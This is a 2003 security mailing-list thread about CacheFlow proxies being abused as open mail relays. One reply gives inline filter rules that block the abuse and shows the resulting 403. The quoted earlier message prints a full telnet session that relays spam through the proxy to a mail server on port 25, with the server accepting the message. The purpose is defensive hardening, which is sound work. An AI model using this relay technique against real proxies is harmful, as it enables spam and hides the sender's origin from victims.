|
Incidents
Cacheflow proxy abuse (revisited) Sep 10 2003 03:22PM Tim Kennedy (tim timkennedy net) (2 replies) Re: Cacheflow proxy abuse (revisited) Sep 12 2003 07:10AM Alain Fauconnet (alain ait ac th) (1 replies) |
|
|
Privacy Statement |
Alain,
If you make sure all 4 of these lines are in your inline filter,
it will block both the GET and POST methods of making outbound
connections on a cacheflow.
------------------------------------------------------------------------
--
cacheflow#conf t
cacheflow#(config)inline filter-list local ccc
https://.*:(443|80) service=yes
https://.*:[0-9]+/ service=no
http://.*:(443|80) service=yes
http://.*:[0-9]+/ service=no
ccc
------------------------------------------------------------------------
--
Sorry, I left the second two (http) lines out, in my original mail.
I left the log of the original telnet session at the bottom of this
reply. When I add these lines to the cacheflow, and try to GET or
POST to another server, on another port, I get:
------------------------------------------------------------------------
--
memnoch[1075]# telnet 10.0.2.190 80
Trying 10.0.2.190...
Connected to 10.0.2.190.
Escape character is '^]'.
POST / HTTP/1.1
HOST: mail.yellowbrix.com:25
HELO .
HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2678
Content-Type: text/html
Connection: close
------------------------------------------------------------------------
--
At least, it worked for me, and people have stopped relaying through
our cacheflow.
-Tim
On Fri, 12 Sep 2003, Alain Fauconnet wrote:
> Hello,
>
> Thanks for the info. That does prevent the CONNECT abuse, but not the
> POST abuse, which can be used almost in the same way (although a bit
> more difficult) to use a Cachelfow to hide one's tracks when spamming.
>
> Greets,
> _Alain_
>
> > ------------------------------------------------------------------------
--
> > telnet ip.or.hostname.of.cacehflow 80
> > GET / HTTP/1.1
> > HOST: mailserver.victim.com:25
> > HELO .
> > mail from: spammer (at) alter (dot) net [email concealed]
> > rcpt to: target (at) unsuspecting (dot) com [email concealed]
> > DATA
> > Subject: Look Ma! I'm an open relay
> > HI, you've been spammed through an open proxy, because of a bug in the
> > OS code. Have a Great Day!
> > -Spammer
> > .
> >
> > 220 mailserver.victim.com ESMTP Sendmail 8.12.9/8.12.9; Wed, 10 Sep 2003
> > 11:15:31 -0400
> > 500 5.5.1 Command unrecognized: "GET / HTTP/1.0"
> > 500 5.5.1 Command unrecognized: "HOST: memnoch.sugarat.net:25"
> > 250 mailserver.victim.com Hello CacheFlowServer@[xxx.x.x.xx], pleased to
> > meet you
> > 250 2.1.0 spammer (at) alter.net. (dot) . [email concealed] Sender ok
> > 250 2.1.5 target (at) unsuspecting.com. (dot) . [email concealed] Recipient ok
> > 354 Enter mail, end with "." on a line by itself
> > 250 2.0.0 h8AFFVfo011729 Message accepted for delivery
> > 500 5.5.1 Command unrecognized: "Cache-Control: max-stale=0"
> > 500 5.5.1 Command unrecognized: "Connection: Keep-Alive"
> > 500 5.5.1 Command unrecognized: "Client-ip: xx.xx.x.xxx"
> > 500 5.5.1 Command unrecognized: ""
> > ^]
> > telnet> close
> > Connection closed.
> >
> > ------------------------------------------------------------------------
--
------------------------------------------------------------------------
---
Attend Black Hat Briefings & Training Federal, September 29-30 (Training),
October 1-2 (Briefings) in Tysons Corner, VA; the world's premier
technical IT security event. Modeled after the famous Black Hat event in
Las Vegas! 6 tracks, 12 training sessions, top speakers and sponsors.
Symantec is the Diamond sponsor. Early-bird registration ends September 6.Visit us: www.blackhat.com
------------------------------------------------------------------------
----
[ reply ]